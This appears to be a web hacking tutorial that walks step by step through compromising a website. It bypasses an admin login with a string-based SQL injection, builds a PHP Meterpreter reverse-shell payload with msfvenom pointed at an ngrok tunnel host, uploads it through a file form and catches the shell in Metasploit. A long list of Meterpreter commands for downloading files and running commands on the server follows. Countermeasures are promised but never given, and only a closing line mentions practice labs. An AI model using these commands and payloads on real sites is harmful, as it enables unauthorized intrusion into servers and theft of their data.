In a recent survey, only 15% of business owners saw security as a challenge when more than half had reported being hacked and of that, only 6% of small businesses don’t have anyone handling their online security.

More people have access to the internet than ever before. This has prompted many organizations to develop web-based applications that users can use online to interact with the organization. Poorly written code for web applications can be exploited to gain unauthorized access to sensitive data and web servers.

In this article, we will introduce you to web applications hacking technique and the counter measures you can put in place to protect against such attacks.

Requirements –

A vulnerable website/application Ngrok – Secure tunnel Msfvenom and Msfconsole

Most web applications are hosted on public servers accessible via the Internet. This makes them vulnerable to attacks due to easy accessibility. The following are common web application threats.

SQL Injection

Denial of Service Attacks

XSS Attacks

CSRF Attacks

File Inclusion Attacks

Session/Cookie Hijacking

Code Injection

Defacement

In this practical scenario, we are going to hack the admin panel of a website through String based SQL Injection and then will try to upload a malicious exploit through a form via upload field and then will get the reverse connection in Meterpreter.

So first step to bypass the login panel via string based SQL Injection. SQL Injection is one of the most common web hacking technique and usually occurs when you ask a user for input, like username and password. A hacker can get easily access to user names and passwords in a database by simply inserting ‘or”=’ into the user name and password text box as shown below:

If you successfully bypass the login page with SQL code then in next step, you need to setup a ngrok tunnel service so that you can get the reverse connection of that website over Internet/WAN.

For this, you need to use ngrok.com, start by creating a simple account and download the package from the website according to your architecture.

After creating an account, you need to unzip the package with the command “unzip <package name>” and then install the authtoken as provided in above screenshot with command “./ngrok authtoken <your token>“.

Now start the TCP service of ngrok with port 4444 by typing “./ngrok tcp 4444“. You can choose any port depending upon your need.

The above command will give a local forwarding address which is tcp://0.tcp.ngrok.io with forwarding port number 18290 which accepts all remote requests and will forward to your localhost with same port i.e. 4444 which you used in first command while starting the ngrok tcp service.

So here in this case, your LHOST = 0.tcp.ngrok.io and your LPORT = 18290.

Now next step is create a malicious payload using msfvenom utility which is default installed in Kali Linux operating system.

Command: msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=18290 R > hack.php

Here -p stands for payload and R stands for Raw format.

Now your hack.php file is saved in your root location which you need to upload it to that hacked website via any internal form where browse functionality is there. So in above site, we successfully bypass the login panel and then by luck we found one php form with File Upload functionality where we successfully uploaded our malicious file into that server.

Now next step is to find the path of uploaded file, that you can easily find through “Index of /” dork. So here in this case, our file name is “150135111_hack.php“.

Once your payload got uploaded in remote server by any hacking technique, you need to run the metasploit framework and get the reverse connection. To start the metasploit framework, type “msfconsole” in your terminal.

So here we’ll use multi/handler exploit by typing “use exploit/multi/handler” in same terminal and the payload which we’ll use is “set payload php/meterpreter/reverse_tcp“.

Here you need to set your LHOST and LPORT, if you are using ngrok or any other tunnel service, then your LHOST address will always be 0.0.0.0 but if you are using this metasploit framework in LAN, then you need to put your local IP address which you can easily get it through by typing “ifconfig” in your terminal.

As soon as you run the exploit in metasploit and execute the hack.php in browser you’ll instantly get the reverse meterpreter connection over Internet.

Here in above screenshot, you can see, you’ve successfully entered into remote server. Type “ls” to list out all files in remote server.

The command “pwd” will gives you the current path where you’ve uploaded your malicious file.

Here are some list of command which you can easily use with meterpreter.

? – Help menu

background – Backgrounds the current session

bgkill – Kills a background meterpreter script

bglist – Lists running background scripts

bgrun – Executes a meterpreter script as a background thread

channel – Displays information or control active channels

close – Closes a channel

disable_unicode_encoding – Disables encoding of unicode strings

enable_unicode_encoding – Enables encoding of unicode strings

exit – Terminate the meterpreter session

get_timeouts – Get the current session timeout values

help – Help menu

info – Displays information about a Post module

irb – Drop into irb scripting mode

load – Load one or more meterpreter extensions

machine_id – Get the MSF ID of the machine attached to the session

migrate – Migrate the server to another process

quit – Terminate the meterpreter session

read – Reads data from a channel

resource – Run the commands stored in a file

run – Executes a meterpreter script or Post module

sessions Quickly – switch to another session

set_timeouts – Set the current session timeout values

sleep – Force Meterpreter to go quiet, then re-establish session.

transport – Change the current transport mechanism

use – Deprecated alias for ‘load’

uuid – Get the UUID for the current session

write – Writes data to a channel

cat – Read the contents of a file to the screen

cd – Change directory

checksum – Retrieve the checksum of a file

cp – Copy source to destination

dir – List files (alias for ls)

download – Download a file or directory

edit – Edit a file

getlwd – Print local working directory

getwd – Print working directory

lcd – Change local working directory

lpwd – Print local working directory

ls – List files

mkdir – Make directory

mv – Move source to destination

pwd – Print working directory

rm – Delete the specified file

rmdir – Remove directory

search – Search for files

upload – Upload a file or directory

portfwd – Forward a local port to a remote service

execute – Execute a command

getenv – Get one or more environment variable values

getpid – Get the current process identifier

getuid – Get the user that the server is running as

kill – Terminate a process

localtime – Displays the target system’s local date and time

pgrep – Filter processes by name

pkill – Terminate processes by name

ps – List running processes

shell – Drop into a system command shell

sysinfo – Gets information about the remote system, such as OS

You can even upload your malicious file via file inclusion attacks that we’ll discuss further.

Note: Be careful when you are using this attempt in live website, you can use any of the vulnerable machine like DVWA, bWAPP etc for testing and learning purposes.